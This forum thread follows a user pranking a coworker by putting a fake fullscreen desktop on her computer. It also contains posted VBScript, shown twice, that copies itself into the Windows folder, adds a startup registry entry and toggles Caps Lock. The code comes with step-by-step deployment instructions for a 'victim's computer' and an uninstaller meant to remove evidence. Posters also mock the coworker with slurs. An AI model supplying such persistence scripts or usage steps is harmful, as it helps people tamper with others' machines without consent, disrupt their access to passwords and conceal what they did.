Work: at the end of my rope

Heh Stern I guarantee you she will go up to you and complain when the computer doesn't work :P

Updates?!??!? I need my amusement from the forum for the day :D
she's not in until 4 pm's 3:30 now's ready and waiting :)
she hasnt come in yet's waiting for her looks no different than the usual desktop excpet it's all a jpeg click clickclickclick
na na na na naaahhh, the hour is approaching...

Stern, what kind of access do you have to the computer? Do you have to log on? Do you have admin rights?
yes and no ...I have access but not to the admin ..I have it set up so that I can easily change it back with a few keystrokes ...lessens the chance of getting caught
SHE"S HERE SHE"S HERE!!! ..on time too

ok, I'lll keep you updated
just moved the mouse to take it out of sleep mode ...staring at the fake pop up email notification
Icarusintel said:
or at least more tense than the last crap i took
Thats good to know. You seem so irritable I was wondering if you were constipated or something.
she's moving her mouse around and clicking click click

clickclickclickclick ..

she's getting frustrated, just mumbled "what's wrong with this mouse" and just banged it on the table to move it around

"stern ......I cant seem to get my email ...I click on the ok button but nothing happens ...hehehe I said "try clicking the space bar or the enter key"

now she's trying every key

"it's not working"

"maybe you should ask the IT guy"

k I've just changed it back

5 mins later

she comes back with the IT guy and he clicks but nothing is wrong ..he's confused because he dioesnt understand what her problem was and asjs her to explain "I clicked on my email but nothing happened" ...the IT guy actually said "did you right click or left click" ..she said "what does that mean?" ...he pointed at the mouse buttons .."right or left" ..she said "left" ...he said "well it's working now" and leaves ....I'm trying not to laugh but on the way out he looked at me and rolled his eyes as if to say "what an idiot"

she just pushed the power button to re-start ...I was going to turn it back on when she got up again :E ....hmmm I'll have to be fast
What kind of program are you running, how does she not notice it(excluding how dumb he is...)?
she just said

"where did that email go"

hehheh the email notification was just a pic
Foxtrot said:
What kind of program are you running, how does she not notice it(excluding how dumb he is...)?

it's just a flash projector file with a screenshot of her desktop
CptStern said:
it's just a flash projector file with a screenshot of her desktop
Ah, and I suppose it has an option to not show up in the toolbar or taskbar or anything.
actionscript ..fullscreen

fscommand("fullscreen", "true");
Nice going CptStern.

If you decide to continue to mess with her, let us know. I have a couple of visualbasic files you may find... interesting. :E
You could always make a simple program to have the system bell go off in different tunes.
Foxtrot said:
You could always make a simple program to have the system bell go off in different tunes.

lol.. that'd be more annoying that funny, like them old ringtones people used to have. but not as annoying as crazyfrog.
class thread btw, I myself am interested in these VB files ;) I'd learn it myself, i'd love to completely prank my housemates next year.
no man, that can be traced back to me it is the only thing that shows on her computer is a shortcut to the file one would notice it and it's easy to quickly quit if the need arises

last update ...ok so I didnt get a chance to set up again, but she's in on monday

what other types of things could I do to her ...please think of something using the same method because it works well
CptStern said:
what other types of things could I do to her ...please think of something using the same method because it works well

Bear trap under the desk.

I must admit I haven't really read this thread so I don't know what "the same method" would be.

Violence never loses though.
I like the bear trap idea ..but kinda bloody ..besides what if she asks me to gnaw off her leg? ewwwww

for the newcomers ...I set up her desktop to look normal but she cant actually open any of her folders or icons because it's just a screenshot of her desktop :)
Make it repeat an annoying sound when she clicks. I've never used flash, don't know what you can and can't do.
wow - I'm lucky to work where the idiocy is departments away. That sounds awful.
SimonomiS said:
Make it repeat an annoying sound when she clicks. I've never used flash, don't know what you can and can't do.

that's actually a good idea ..the click annoying sound ..and it's do-able in flash ..just need annoying believable sounds..cant be like a fart or something cuz she'll figure it out
Do you think you could make the internal PC Speaker beep upon every mouse click or key press? That damn internal speaker is annoying as hell... :P Although that would annoy you also... Not sure.
Well, someone expressed interest in the Visual Basic pranks I pulles at school, so I will take the opportunity to show off mercilessly. :E

The prank I got the best result with is simple in theory. Once run on someones computer, the VBS file copies itself to the windows directory, adds a note to the registry to run it on startup, and executes a simple script that turns Capslock on and off about once a second.

Hilarity usually ensues as the victim is unable to tYpE AnyTHinG iN onE casE. One slightly malicious aspect to this program is that the victim will be unable to access anything that needs a password unless they focus hard. They usually get annoyed when they realise restarting does not solve the problem.

To use the code, copy and paste it into notepad, and save it as 'Installer.vbs' The filename is important, because I dont know enough VBS to make it better. To Use:

1. Place 'Installer.vbs' on the root of the C: drive. The path must be C:\Installer.vbs or it won't work!
2. Run the file.
3. Thats it. You may now delete the file.

Heres the code:
'Copies C:\Installer.vbs to C:\Windows\SysMyn.vbs

Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\Installer.vbs", "C:\Windows\SysMyn.vbs"

'Alters the registry to run C:\Windows\SysMyn at startup

Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.RegWrite "HKLM\software\microsoft\windows\currentversion\run\sysmyn", "C:\Windows\SysMyn.vbs"

'Turns Capslock on and off

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 500
wshshell.sendkeys "{CAPSLOCK}"

Since I am so brilliant (and so geeky), and since the fun often depends on being able to remove the evidence, I have also created an uninstall file.

1. Save the code as whatever.vbs (filename not important)
2. Place anywhere on victims computer (path not important)
3. Run. All evidence of the original prank will be removed (not including the original installer file!), and Capslock will stop flashing. Simple as that.

Uninstall file:
'deletes the file

Set fso=CreateObject("Scripting.FileSystemObject")
fso.deletefile ("C:\Windows\SysMyn.vbs")

'removes the registry entry

Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.RegDelete "HKLM\software\microsoft\windows\currentversion\run\sysmyn"

'stops the process

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strQuery = "Select * from Win32_Process where Name='WScript.exe'"
Set colItems = objWMIService.ExecQuery(strQuery,,48)
For Each objItem in colItems

I would post the files themselves, but .vbs files often contain viruses and are blocked by these forums and most other things. Unfortunately, they sometimes provoke virus scanners into a malicious script warning, so beware.

Oh, and dont post on these forums under the influence of what someone called 'The Capslock Virus', or you will be mistaken for a n00b and banned before you can explain. :E

jabberwock95 said:
Well, someone expressed interest in the Visual Basic pranks I pulles at school, so I will take the opportunity to show off mercilessly. :E

The prank I got the best result with is simple in theory. Once run on someones computer, the VBS file copies itself to the windows directory, adds a note to the registry to run it on startup, and executes a simple script that turns Capslock on and off about once a second.

Hilarity usually ensues as the victim is unable to tYpE AnyTHinG iN onE casE. One slightly malicious aspect to this program is that the victim will be unable to access anything that needs a password unless they focus hard. They usually get annoyed when they realise restarting does not solve the problem.

To use the code, copy and paste it into notepad, and save it as 'Installer.vbs' The filename is important, because I dont know enough VBS to make it better. To Use:

1. Place 'Installer.vbs' on the root of the C: drive. The path must be C:\Installer.vbs or it won't work!
2. Run the file.
3. Thats it. You may now delete the file.

Heres the code:
'Copies C:\Installer.vbs to C:\Windows\SysMyn.vbs

Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\Installer.vbs", "C:\Windows\SysMyn.vbs"

'Alters the registry to run C:\Windows\SysMyn at startup

Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.RegWrite "HKLM\software\microsoft\windows\currentversion\run\sysmyn", "C:\Windows\SysMyn.vbs"

'Turns Capslock on and off

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 500
wshshell.sendkeys "{CAPSLOCK}"

Since I am so brilliant (and so geeky), and since the fun often depends on being able to remove the evidence, I have also created an uninstall file.

1. Save the code as whatever.vbs (filename not important)
2. Place anywhere on victims computer (path not important)
3. Run. All evidence of the original prank will be removed (not including the original installer file!), and Capslock will stop flashing. Simple as that.

Uninstall file:
'deletes the file

Set fso=CreateObject("Scripting.FileSystemObject")
fso.deletefile ("C:\Windows\SysMyn.vbs")

'removes the registry entry

Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.RegDelete "HKLM\software\microsoft\windows\currentversion\run\sysmyn"

'stops the process

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strQuery = "Select * from Win32_Process where Name='WScript.exe'"
Set colItems = objWMIService.ExecQuery(strQuery,,48)
For Each objItem in colItems

I would post the files themselves, but .vbs files often contain viruses and are blocked by these forums and most other things. Unfortunately, they sometimes provoke virus scanners into a malicious script warning, so beware.

Oh, and dont post on these forums under the influence of what someone called 'The Capslock Virus', or you will be mistaken for a n00b and banned before you can explain. :E


Bahaha, I love it. :cheers:
lol, I love it when people quote massive posts to say one line :E

If theres interest, I may start a 'Computer Pranks' thread.
jabberwock95 said:
lol, I love it when people quote massive posts to say one line :E

If theres interest, I may start a 'Computer Pranks' thread.

I'd be interested :)

Oh and yeah, I looked at my post afterwards and laughed at it... but I sure as hell aint changeing it. :imu:
Iced_Eagle said:
Do you think you could make the internal PC Speaker beep upon every mouse click or key press? That damn internal speaker is annoying as hell... :P Although that would annoy you also... Not sure.
I am so going to look into that...

And I have learned from experiance, nothing is annoying if you are the cause. :E
Newcomer to this thread, (people in the thread mentioned sterns coworkers), read through all of it, having a good laugh.

Will you continue the assault on this dumb bitch stern?